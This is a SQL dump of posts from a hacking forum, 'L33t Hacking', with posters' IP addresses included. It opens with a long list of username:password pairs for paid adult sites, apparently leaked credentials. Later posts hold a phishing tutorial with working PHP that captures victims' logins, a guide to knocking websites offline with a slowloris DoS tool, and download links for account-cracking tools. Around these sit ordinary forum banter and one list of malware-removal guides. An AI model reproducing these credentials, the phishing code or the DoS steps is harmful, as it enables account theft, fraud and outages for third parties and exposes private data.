mobile.realitykings.com\nrealistprez:9184168\nViggo666:deadman\nh040385:9100893\nheowlock:lancheow\nallain31:all4222\nsantiger:santiger22\n\nhttp://members.naughtyamerica.com/index.php?m=login\nfredjf50:fjfdoc11\nardenne2:we11ington\nblinky615:without\nfirebuster:e2T13R10b\nvegasfx:THPXL\nanaryagug94:lumsfg41\nthome531:w523dmh\nwildcat-22:longhorns\ndekester:hunter\nduckduck:duckgoos\necg49ers:49ersecg\nennomasl:voxhuma\nmanboard:blue23\nsasquach:zkio78\ntort2004:storks\n\nhttp://twistys.com/\nedwinres:marlins\nchonny:ch8an3go\nbuckman:solo456\nPorn-w.org:Anal****ingOnEspn\nmtmp90:martian\nrkelly6064:jedi88\ngromittd:redwiaeu\nJimson:8710079\nhornybeast:hornybeast69\n\nhttp://members2.mofos.com/members/\ndivman7:ricky007\nGS21Gracian:KbPb52a\nzfreund:gaunga\ndiseasicon:sillybum\nbestccrunner@aol.com:1runner\nbig_3ta@hotmail.com:3amer1\nbiggross2000@hotmail.com:biggross\n\nhttp://members.anilos.com\nrvp128ass222\nseqou5s:copper\nkli34xx23ass\nbrainrevass23\nsvasileass232\nbra23vop:23pass\nmilfyblogass232\npic999:hunter1\nbeeker:asdf67jk\n\nhttp://passion-hd.com/login\njuelzhot:manning10\n\nhttp://barely18barbie.com/members\nkellron88:zavooo88\nmk2112:s8pjan3l\n\nhttp://bikini-heat.com/area51\npppppppp:gggggggg\nt_f_0000:7angels\n\nhttp://members.brianabanged.com\n020ef7f6:029003d7\n038042af:03804986\n\nhttp://workmycock.com/members\nalecounet:911911\ndomino35:hildab\nrominsarid:romin123\n\nhttp://xpass.com/members/\nbilling:review\ncherokii:indianer\n\nhttp://puremature.com/login\nsteddysteds:nothing1\n\nhttp://members.accessdvdsnow.com/login/\nTessa002:Sophy052\n\nhttp://www.dirtyukwives.com/members_awiz/\ncoaltiger:wakanda\n\nhttp://members.bikinidream.com/\nwm_102266:2XTxdvE3\n\nhttp://porngantic.com/sblogin/login.shtml/membersarea/\nloki2496:nightwin2000\n\nLogin: http://workmycock.com/members\nUser/PW: alecounet:911911\n\nhttp://showgirlzexclusive.com\ncharacter:followin\npbartonb757909\nsturdytime:brittany\ncaptlou:telemark\nqwerty13:qwerty35\nPorn-W.org:GotToLearnToEatPussy\njazztrane:omegared\nbusybee:melinda1\ncshwgm1:Kordell1\nsaltin:scrappie\njayzeedogg:biggdogg\n\nhttp://penthouse.com\nwoodstock:d0nny1r4w4n\n\nhttp://members.downloadpassmobile.com/login.html\nWarren:Airforce\nCode = 83560\n\nhttp://members.18andabused.videosz.com\nbader1010:maha1010\n\nhttp://Vip.smut.com\ntijhuisj:jlat1309\n\nhttp://cfnmtv.com\nrwambolt:captain\njuan2710:jclh2710\nkalel666:yossi666\npongid:shinmen\nbuddyarg:milesarg\n\nhttp://v2.shareadult.com/members/\nclyngh:elliott\nflashed89:temp07\n\nhttp://vivid.com&nbsp;\nChuter:Libra25\n\nhttp://members.hustler.com/\nb7hnph:mu1mzj\nipcusa1114:ipcusa\n\nhttp://myhotwife.com/\nmxxx01:trombone\nCHRISA:131313', '94.132.244.168', '1585771688', '1', '0', '62', '1346879203', '1', 'f2710a42eebb3c6e1b6427640b3dad04', '0', '1346879203'); INSERT INTO mybb_posts VALUES('1615', '323', '1611', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346880353', '[quote=\'iTzIpod\' pid=\'1611\' dateline=\'1346875256\']\r\n[quote=\'t3h jok3r\' pid=\'1592\' dateline=\'1346812975\']\r\n[quote=\'iTzIpod\' pid=\'1582\' dateline=\'1346801158\']\r\n[quote=\'t3h jok3r\' pid=\'1581\' dateline=\'1346801116\']\r\nI can understand, we have some cool updates coming up for LH.\r\n[/quote]\r\n\r\nMind PMing me some info or spoilers?\r\n[/quote]\r\n\r\nNope, it spoils the fun.\r\n[/quote]But it builds up the curiosity. \r\n\r\n\r\nWaiting is not really fun :3\r\n[/quote]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9cf1cb883205d62f4bb728bb46c2d185', '0', '0'); INSERT INTO mybb_posts VALUES('1616', '323', '1615', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346884685', '[quote=\'t3h jok3r\' pid=\'1615\' dateline=\'1346880353\']\r\n[quote=\'iTzIpod\' pid=\'1611\' dateline=\'1346875256\']\r\n[quote=\'t3h jok3r\' pid=\'1592\' dateline=\'1346812975\']\r\n[quote=\'iTzIpod\' pid=\'1582\' dateline=\'1346801158\']\r\n[quote=\'t3h jok3r\' pid=\'1581\' dateline=\'1346801116\']\r\nI can understand, we have some cool updates coming up for LH.\r\n[/quote]\r\n\r\nMind PMing me some info or spoilers?\r\n[/quote]\r\n\r\nNope, it spoils the fun.\r\n[/quote]\r\n\r\n\r\nWaiting is not really fun :3\r\n[/quote]\r\nBut it builds up the curiosity. \r\n[/quote]\r\n\r\nTrue. :p \r\nBut I find spoilers fun :3\r\n\r\nIt\'s not like I\'m going to be telling everyone.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bbab4b2916ce83936caa27b8be262ace', '0', '0'); INSERT INTO mybb_posts VALUES('1617', '342', '0', '3', '[Announcement] Domain Change', '0', '82', 'iTzIpod', '1346885024', 'Hey LH, \r\n\r\nRecently/Earlier today, L33t Hacking was experiencing errors. This was because of the domain change. \r\n\r\nt3h jok3r recently changed the domain name of L33t Hacking.\r\n\r\nThe previous domain was l33thacking.com\r\nAnd now, the current/new domain is l33thacking.net\r\n\r\nThis is just a small update.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '80025ec84c1128458e6e89696f661db6', '0', '0'); INSERT INTO mybb_posts VALUES('1619', '323', '1505', '7', 'RE: If I go inactive', '0', '61', 'NXK', '1346898215', 'You guys should respect that he\'s going to school. I honestly encourage you to do so and try as hard as you can. It will help you so much in the long run.\n\nRight now i\'m in college a year behind all my friends because I skipped in high school and played video games, Smoked weed and party\'d. Look where it got me.. Pretty much no where. I\'ve changed And honestly All I can say is good luck man and keep trying.\n\nYou\'re doing the right thing.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'fa73904a412cf8f7165c9bb4f4bc0281', '0', '0'); INSERT INTO mybb_posts VALUES('1620', '238', '1468', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346900697', '[quote=\'iTzIpod\' pid=\'1468\' dateline=\'1346644371\']\r\n[quote=\'Timmy\' pid=\'1461\' dateline=\'1346643920\']\r\nBanned for having a blue username.\r\n[/quote]\r\n\r\nBanned for posting above me.\r\n[/quote]\r\n\r\nBanned for being in \"Unique.\"', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'e85960d1e17282a2d99090d7e3fac157', '0', '0'); INSERT INTO mybb_posts VALUES('1621', '249', '1428', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1346900760', '[quote=\'iTzIpod\' pid=\'1428\' dateline=\'1346505643\']\r\nBaws, you\'re not winning. I am.\r\n[/quote]\r\n\r\nYou might wanna check again.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'e21608ec1ddff514d7c09680db5d13a2', '0', '0'); INSERT INTO mybb_posts VALUES('1622', '323', '1505', '7', 'RE: If I go inactive', '0', '55', 'Baws', '1346900827', 'I started yesterday too, too much homework man. -_-', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '9314f5adac54b9298ff286d81fcc7807', '0', '0'); INSERT INTO mybb_posts VALUES('1623', '344', '0', '3', 'Quick Updates and Notices V.2', '0', '1', 't3h jok3r', '1346900949', 'These are some recent updates and stuff I\'m working on.\r\n\r\n[list]\r\n[*] L33THacking has a new URL\r\n[*] Username History Plugin Updated and from now on, members can\'t edit post after a Moderator edit\r\n[*] LH Staff are currently working on the email issues.\r\n[*] Awards plugin is being a bitch and it\'s taking longer than I thought to fix it.\r\n[*] Congratz NXK on the promotion to Staff, JakeUS was demoted upon request. \r\n[*] All welcome PMs that we auto send when people activate their accounts have been deleted. WE DID [b]NOT[/b] ENTER INTO ANYONES\' ACCOUNT!\r\n[*][i][b] We will get some SQL Errors for few mins that\'s because I\'m going to be fixing the Awards plugin. Please report any SQL Errors you get in this forum by creating a thread.\r\n[/list][/b][/i]\r\n\r\n[b]Updated[/b]\r\n\r\n[list]\r\n[*] Fixed the complaints section bug\r\n[*] [size=large][b]L33THacking staff has decided to NEVER keep ADs on LH even though we need money to run LH we will manage from upgrades, stickies and donations. One upgrade can keep LH up for at least a month.[/b][/size]\r\n[/list]', '72.229.164.105', '1223009385', '1', '0', '1', '1346946869', '1', 'bffc8a9e3e69e11250834ebc7b564703', '0', '1346946869'); INSERT INTO mybb_posts VALUES('1625', '344', '1623', '3', 'RE: Quick Updates and Notices', '0', '61', 'NXK', '1346903158', 'This is awesome. I\'m loving how much things are moving along here, And only getting better!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'd4d1083f572dc862072a577326caec0c', '0', '0'); INSERT INTO mybb_posts VALUES('1626', '344', '1623', '3', 'RE: Quick Updates and Notices V.2', '0', '1', 't3h jok3r', '1346946897', 'Updated the thread, for those who ave read this read already please read the updated two points.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'a1b5022f41befd9730303e8fce8f691c', '0', '0'); INSERT INTO mybb_posts VALUES('1627', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '62', 'R?????zo?', '1346958744', 'I\'m winning like a baws :P\nsorry baws, had to say it :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5e671d39b6a47cb08c28bae5ce1f2f96', '0', '0'); INSERT INTO mybb_posts VALUES('1628', '344', '1623', '3', 'RE: Quick Updates and Notices V.2', '0', '82', 'iTzIpod', '1346961651', 'Dang.\n\n1 Upgrade = 1 month? Woah :o\n\n\nGratz NXK on SMod. \n\nJakeUS sad to see you get demoted upon request :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd7b3e0822e8bff05e9deda2f28ed788a', '0', '0'); INSERT INTO mybb_posts VALUES('1629', '323', '1505', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346961745', 'Just finished my homework now. =]\nThank God. \n\n@NXK, good luck with your future. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68de29cf1d9a52f4dee268d5cc83978a', '0', '0'); INSERT INTO mybb_posts VALUES('1630', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346961786', 'Lol @Reloadzor but still, I won.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eb1627ef50340aa346eff5e4c04efeed', '0', '0'); INSERT INTO mybb_posts VALUES('1631', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346961828', 'Banned for not being in Unique. ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a919e504394d398bcf30696d2040da5a', '0', '0'); INSERT INTO mybb_posts VALUES('1632', '345', '0', '63', 'Need userbar! [Gamers]', '0', '61', 'NXK', '1346962407', 'Iv\'e been working on userbars for a (Possible new group) <- Not confirmed.\r\n\r\nBut take a look at these 2 user bars I came up with. Tell me what you think :) (these are just in beta stage)\r\n\r\nhttp://imgur.com/a/dd02l\r\n\r\nor \r\n[img]http://i.imgur.com/t92Nl.png[/img]\r\n[img]http://i.imgur.com/mIg5W.png[/img]\r\n\r\nIv\'e decided to let the community help with this one!\r\nIf you can do better post it in this thread.\r\n\r\n\r\nI\'m not into graphics really at all. I just have some basic photoshop knowledge. If you think you can do better let me know.', '99.253.65.17', '1677541649', '0', '0', '1', '1347249017', '1', '2c843d4f674ec7eaa1705f3fc8fca2d6', '0', '1347249017'); INSERT INTO mybb_posts VALUES('1633', '281', '1543', '84', 'RE: Upload N Sell Exploit', '0', '82', 'iTzIpod', '1346962736', '[quote=\'sirchamp\' pid=\'1543\' dateline=\'1346766658\']\r\nSame by me bchkhackforums something XBL theres some key in it\r\n[/quote]\r\n\r\n\r\nYeah. I always get that message. I don\'t know why.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5ca68efa220ca80801977c3fc98dfcdf', '0', '0'); INSERT INTO mybb_posts VALUES('1634', '191', '1605', '15', 'RE: ProDos v1.0', '0', '82', 'iTzIpod', '1346962803', '[quote=\'sirchamp\' pid=\'1605\' dateline=\'1346857255\']\r\nGood luck with taking down facebook or wathever huge site you tried..\r\n[/quote]\r\n\r\nRolf. Are you trying to kill me via laughter? O_o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '94dcb9ab36d2c1591da5d066f2888f06', '0', '0'); INSERT INTO mybb_posts VALUES('1635', '340', '1604', '16', 'RE: Free Nike\'s SE', '0', '112', '??????Z', '1346963257', 'Both sent! :) let me know how you all get on :)', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', '09952c486eba80289d4c3bd756b51351', '0', '0'); INSERT INTO mybb_posts VALUES('1636', '238', '1631', '56', 'RE: Ban the user above you', '0', '61', 'NXK', '1346963554', '[quote=\'iTzIpod\' pid=\'1631\' dateline=\'1346961828\']\r\nBanned for not being in Unique. ;)\r\n[/quote]\r\n\r\nbanned cuz bald', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '0e240d318f96886ec071cd0452909b2f', '0', '0'); INSERT INTO mybb_posts VALUES('1637', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346963756', 'Smart guy... Hmm..\n\nBanned for having some abstract avatar? :o\n\nI really don\'t know what that is...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d13c61df9ef827d7b1810f7e2fad916', '0', '0'); INSERT INTO mybb_posts VALUES('1638', '345', '1632', '63', 'RE: Userbars [Gamers]', '0', '82', 'iTzIpod', '1346963845', 'I like the second one since the mushrooms pop out. But I really hate mushrooms.\n\n\nI would like the first one if coins came out :p But for right now, I would say the mushroom one..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '591ec1923370dda5bc782205faaadf28', '0', '0'); INSERT INTO mybb_posts VALUES('1639', '238', '1637', '56', 'RE: Ban the user above you', '0', '61', 'NXK', '1346963892', '[quote=\'iTzIpod\' pid=\'1637\' dateline=\'1346963756\']\r\nSmart guy... Hmm..\r\n\r\nBanned for having some abstract avatar? :o\r\n\r\nI really don\'t know what that is...\r\n[/quote]\r\n\r\nBanned for not knowing the head shot icon in counter strike. The platform game for ANY FPS out there today.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '83f866566687cec255f2bb184171c6e3', '0', '0'); INSERT INTO mybb_posts VALUES('1640', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346963961', 'Banned for thinking I play Counter Strike..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c83a0d59fba0c8a07d31b1fe433294ef', '0', '0'); INSERT INTO mybb_posts VALUES('1641', '326', '1520', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '112', '??????Z', '1346964231', 'attempted McDonald\'s and Nandos. will update if it works out :)', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', '839857dbf021453343e3f485a59d5bf4', '0', '0'); INSERT INTO mybb_posts VALUES('1642', '346', '0', '19', '[Junk]Heads Up', '0', '82', 'iTzIpod', '1346964654', 'Please don\'t expect us to be releasing a lot of stuff. Since right now, the forum is still low on active members.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7fd1bc98b78a2144db04df1ad30d58f8', '0', '0'); INSERT INTO mybb_posts VALUES('1643', '347', '0', '19', '[Junk]Warning', '0', '178', 'The Host', '1346966395', 'Hello,\r\n\r\nThe only reason I have joined is to post this final warning.\r\n\r\nYou may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links.\r\n\r\nI understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong.\r\n\r\nThis is your first and final warning, next time I won\'t waste my time warning you.\r\n\r\n~Hostpro', '94.13.132.145', '1577944209', '1', '0', '0', '0', '1', '5a22e4700f432d2e21de5cd2f406d2d3', '0', '0'); INSERT INTO mybb_posts VALUES('1644', '347', '1643', '19', '[Junk]Warning', '0', '1', 't3h jok3r', '1346966469', 'This thread has been junked.', '173.245.64.101', '-1376436123', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('1645', '338', '1610', '4', 'RE: Hola', '0', '112', '??????Z', '1346968042', '[quote=\'Apathy\' pid=\'1610\' dateline=\'1346875125\']\r\nTry to be active and enjoy your stay.\r\n[/quote]\r\n\r\nThanks, will do :)', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', '035afac4d5e2b8967b972ecc4ff5d213', '0', '0'); INSERT INTO mybb_posts VALUES('1646', '344', '1628', '3', 'RE: Quick Updates and Notices V.2', '0', '1', 't3h jok3r', '1346968909', '[quote=\'iTzIpod\' pid=\'1628\' dateline=\'1346961651\']\r\nDang.\r\n\r\n1 Upgrade = 1 month? Woah :o\r\n\r\n\r\nGratz NXK on SMod. \r\n\r\nJakeUS sad to see you get demoted upon request :/\r\n[/quote]\r\n\r\nThe best is always expensive.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '452e343a0b615224a9bb936359e0e14b', '0', '0'); INSERT INTO mybb_posts VALUES('1647', '348', '0', '30', 'Brazzers Cracker', '0', '1', 't3h jok3r', '1346970335', 'Pic:\r\n\r\n[img]http://i54.tinypic.com/2s6lf7b.jpg[/img]\r\n\r\nVideo:\r\n\r\n[video=youtube]https://www.youtube.com/watch?v=2HVApTq4HpA[/video]\r\n\r\nVirusScan:\r\nhttp://www.virustotal.com/file-scan/repo...1315777537\r\n\r\nDownload:\r\n\r\n[url=http://uploading.com/files/dm3ab224/Br4223r5.rar/]Br4223r5.rar - 1.7 MB[/url]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '97190558342e07c9cdb858e402a4d3db', '0', '0'); INSERT INTO mybb_posts VALUES('1648', '349', '0', '33', 'Everyone Read', '0', '82', 'iTzIpod', '1346970400', 'Are you new to GFX?\r\nWell then, you\'re lucky. I will help you make GFX just like me. Well, atleast I will try my best. I won\'t guarantee anything. \r\n\r\nBut I will teach you the basics. \r\n\r\nNote: Please don\'t ask me questions about Gimp. I don\'t use it nor recommend it. \r\n\r\nIf you want Photoshop CS3 or Photoshop CS4, then visit : http://www.youtube.com/watch?v=dLrqDVRBers\r\n\r\nAlso, this is not my video.\r\n\r\nAnd add me on Skype for more info!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '64af4d6ffd2eb3e54723d88bc3a7eaa9', '0', '0'); INSERT INTO mybb_posts VALUES('1649', '350', '0', '18', 'WESTi\'s Email Cracker (Crack Any E-Mail - Hotmail, Yahoo, Gmail)', '0', '1', 't3h jok3r', '1346970708', 'This is a tool which cracks e-mail account(s). It can crack any service.\r\n\r\nDownload:\r\n[code]\r\nhttp://www.multiupload.com/PVP8T8J6JF\r\nOR\r\nhttp://uploading.com/files/mdcdb469/Email_Cracker-www.l33ts.org.rar/\r\n[/code]\r\n\r\nPassword:\r\n[code]\r\nwww.l33ts.org\r\n[/code]\r\n\r\nScan and open with Sandboxie.\r\n\r\nEnjoy! :)', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '2b29064354963d3b63eaae2e5a4a94b1', '0', '0'); INSERT INTO mybb_posts VALUES('1650', '191', '666', '15', 'RE: ProDos v1.0', '0', '8', 'spacefish36', '1346970950', 'LMAO, but this knocks down sites for only couple of mins. Does work in a way.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '866662eb693ddfa47423fd37189a81c2', '0', '0'); INSERT INTO mybb_posts VALUES('1651', '351', '0', '46', 'Phishing Tutorial', '0', '8', 'spacefish36', '1346971069', 'This is a basic tutorial on how to make a phishing page.\n\nIndex:\nWhat is a phisher? - 101\nMaking a T35 Account - 102\nGetting Web pages Source Code - 103\nCreating Phish File - 104\nHow to fool people - 105\n------------------------\nWhat is a phisher? 101\n------------------------\n\nA phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.\n\n--------------------------\nMaking a T35 Account 102\n--------------------------\n\nIn order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).spam.com For example: myspace.spam.com Most likeley, it is taken so add numbers like 08, or 07.\n\n--------------------------------------\nGetting Web Pages Source Code 103\n--------------------------------------\n\nAfter you create that page, go to the website you will make a phisher for. Open the login page, From there right-click the page, and click View Source. Copy and paste what has popped-up.\n\n------------------------\nCreating Phish File 104\n------------------------\n\nOnce you have that copied, go to your T35 account. Click on \"New File\" Title it login.htm Then paste your Source Code you copied from 104. Save it.\n\nNow create another file, title it fhish.php And inside, paste this code:\n\n\n[code]\n<?php\nheader(\"Location: http://www.phisshed-website.com\");\n$handle = fopen(\"thepasses.txt\", \"a\");\nforeach($_GET as $variable => $value) {\nfwrite($handle, $variable);\nfwrite($handle, \"=\");\nfwrite($handle, $value);\nfwrite($handle, \"\\r\\n\");\n}\nfwrite($handle, \"\\r\\n\");\nfclose($handle);\nexit;\n?>\n[/code]\n\n\nThe http://www.phisshed-website.com is what the page goes to after the victim logs in, change that to what desired\n\nSave the file.\n\n\nGo back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!\n\n-------------------------\nHow to fool people - 105\n-------------------------\nWhat you do now is disguise your link. Use this code:\n\nT35acount.spam.com/login.htm\n\nThat is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.\n\n[url=xxx.spam.com]*real website name*.com/login.php[/url]\n\nYou do the same for any forum!\n\n\nThank you for reading! Hope it helps! If i was missing something, or you have any questions, PM me!\n\nALTERNATIVES:\n\nAlso, if you don\'t want to use spam.com, use ripway.com and after you uploaded everything, go to http://www.dot.tk and choose a free .tk domain name.\n\nCredits: Rockey Killer', '72.229.164.105', '1223009385', '0', '0', '8', '1346971095', '1', '0fa4a624e9db2542f8429b011d842036', '0', '1346971095'); INSERT INTO mybb_posts VALUES('1652', '352', '0', '12', 'How to Take Down Websites Effectively + Proof', '0', '8', 'spacefish36', '1346971302', '[align=center]\n[size=x-large][color=#006400].:::How to Effectively Down the Websites:::. [/color][/size]\n[img]http://www.resourcesystemsconsulting.com/blog/wp-content/uploads/Shutdown.png[/img]\n[size=medium][color=#FF0000][b]What is DoS attack?[/b][/color][/size]\n\n[b][size=xx-small][color=#FFD700]Short for denial-of-service attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols. For all known DoS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks. But, like viruses, new DoS attacks are constantly being dreamed up by hackers.[/color][/size][/b]\n[/align]\n[align=justify]\n[b][size=medium][color=#FF0000]Finding a Vulnerable Website[/color][/size][/b]\n[b]Most websites using Apache servers,so find any website and go to [color=#FF0000]http://uptime.netcraft.com/[/color] now you need check website.[/b]\n[b]As you can see that this website is Using Apache , which is a Great news , So now , we will try to attack it ,[/b]\n[img]http://i.imgur.com/0qEpH.png[/img]\n[size=large][b][color=#800000]Ready to DoS Attack[/color][/b][/size]\n Now you need to Download QSlowloris [url=http://adf.ly/2bBZR]Here[/url]\n[url=http://www.virustotal.com/file-scan/report.html?id=1d8939bfdbbeb9d6a39d91a2a06c29eb790b6d7b5e96310790d94d7e2c9430e8-1309466345][color=#FF0000][b]Scan Report[/b][/color][/url]\n[b]Now Open Program , and Setup this Tool like this:\n[img]http://i.imgur.com/7G6v4.png[/img]\nNow Click on Fire , and Your Target goes Down, like in this Screenshot , before it is working , but Afterward this is Down,\n\nIf u have any Doubt on the Tool, that some think like of \"It is coded , with some this type of feature that when we put Website , and click fire, it will disable from our Computer Just\" But in Real , You can check that it gonna down from all Computer of the World As Given in Screen Shot , You can check online that, if this website Down or Not.\n[color=#FF0000]http://downforeveryoneorjustme.com[/color]\n[img]http://i.imgur.com/UIKW5.png[/img]\n[/align][/b]\nNOTE: If your Website Didnot Get Down , then note that this website Apeche if Powerful.\n[b][color=#8B4513]Thanks 4 Watching this Tutorial.[/color][/b]\n\n[color=#006400][b]Credits:- asad3man[/b][/color]', '72.229.164.105', '1223009385', '0', '0', '1', '1347079276', '1', 'd3f3a9bc1aeb13f3bb4da7937406afb5', '0', '1347079276'); INSERT INTO mybb_posts VALUES('1692', '352', '1689', '12', 'RE: Linear Mode How to Take Down Websites Effectively + Proof', '0', '1', 't3h jok3r', '1347079330', '[quote=\'NXK\' pid=\'1689\' dateline=\'1347078187\']\r\n[quote=\'p420\' pid=\'1687\' dateline=\'1347076992\']\r\n[quote=\'NXK\' pid=\'1660\' dateline=\'1346972166\']\r\nSeems legit. Please add a virus scan for your DoS tool.\r\n[/quote]\r\n\r\nDude there\'s no need for a virus scan because the download link is seized by the Feds.\r\n[/quote]\r\n\r\nThan may I ask why there is a download link?\r\n[/quote]\r\n\r\n:roflol:\r\n\r\nThe OP is Spacefish, not P420.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '7a308bf8139c236566b7c5937f41c2a0', '0', '0'); INSERT INTO mybb_posts VALUES('1653', '156', '449', '13', 'RE: [tut]View/Download SQL DB', '0', '13', 'unixmoon', '1346971441', 'Damn this shit works. This shit mad crazy..', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '29206ee315da022febcd51c49613d638', '0', '0'); INSERT INTO mybb_posts VALUES('1654', '353', '0', '13', '[Complete Guide]*How to crack All Sites Hosting With Apex!*[Complete Guide]', '0', '13', 'unixmoon', '1346971496', '[color=#32CD32][size=large][align=center][b]*How to crack All Sites Hosting With Apex!*[/b][/align][/size][/color]\r\n[align=center]\r\n[color=#87CEFA][b]Today I will teach you to use this wonderful program (APEX) which you can crack it all and more!\r\n[/b][/color]\r\n[/align]\r\n\r\n[align=center][img]http://nextube.org/forum/images/imported/2011/01/369.png[/img][/align]\r\n\r\n[align=center][img]http://nextube.org/forum/images/imported/2011/01/370.png[/img][/align]\r\n\r\n[align=center][img]http://nextube.org/forum/images/imported/2011/01/371.png[/img][/align]\r\n\r\n[align=center][img]http://nextube.org/forum/images/imported/2011/01/372.png[/img][/align]\r\n\r\n[align=center][img]http://nextube.org/forum/images/imported/2011/01/373.png[/img][/align]\r\n\r\n[align=center][img]http://nextube.org/forum/images/imported/2011/01/374.png[/img][/align]\r\n\r\n[align=center][img]http://nextube.org/forum/images/imported/2011/01/588.png[/img][/align]\r\n\r\n[align=center][img]http://nextube.org/forum/images/imported/2011/01/375.png[/img][/align]\r\n\r\n[align=center][img]http://nextube.org/forum/images/imported/2011/01/376.png[/img][/align]\r\n\r\n[align=center][img]http://nextube.org/forum/images/imported/2011/01/377.png[/img][/align]\r\n\r\n\r\n\r\n[color=#87CEFA][align=center][b]Here some References for you :[/b][/align][/color]\r\n\r\n\r\n[align=center][b]Have Fun Cracking! :glad:[/b][/align]\r\n\r\nCredit to Heppona', '72.229.164.105', '1223009385', '0', '0', '13', '1346971541', '1', 'aded7ea790bdd3b24355c46f28b9d8a5', '0', '1346971541'); INSERT INTO mybb_posts VALUES('1655', '344', '1623', '3', 'RE: Quick Updates and Notices V.2', '0', '13', 'unixmoon', '1346971591', 'Nice updates, thanks Jok3r for the updates and your hard work.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '454b05fc00e1e291c0dd417b2f4bfad3', '0', '0'); INSERT INTO mybb_posts VALUES('1656', '354', '0', '23', '[MBAM] Self-Help Removal Tutorials', '0', '13', 'unixmoon', '1346971723', 'While scouring the internet in search of ideas of content to populate our White Hat Section I stumbled across an old abandoned thread on HF. At one point in time it had served as a link directory to articles on how to remove specific Malware as written by MBAM Forum Staff.\r\n\r\nSo after a lot of updating and revising, here\'s the resurrected thread, the way it was meant to have been posted.\r\n\r\nI would like to say thank you to \"Miah\" on HF for giving me this idea.\r\n\r\nI\'ll try to update this periodically.\r\n[i]Last Revision 08/28/12[/i]\r\n\r\n[color=#00BFFF][b]List:[/b][/color]\r\n[list]\r\n[*][color=#00BFFF][b]2012 Self Help Guides[/b][/color][list]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=114520]Removal instructions for Kotech-Protect[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=114491]Removal instructions for WindowsBoanPatch[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=114424]Removal instructions for Windows Safety Series[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=114218]Removal instructions for Super Boan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=114087]Removal instructions for Windows Anti-Malware Patch[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=114040]Removal instructions for BitClean[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=113830]Removal instructions for Windows Interactive Safety[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=113699]Removal instructions for VitaVaccine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=113669]Removal instructions for Windows Antivirus Machine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=113459]Removal instructions for MasterBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=113262]Removal instructions for CoreSecure[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=113238]Removal instructions for Windows Active Guard[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=113106]Removal instructions for VaccineForce[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=112896]Removal instructions for Windows Security Renewal[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=112641]Removal instructions for 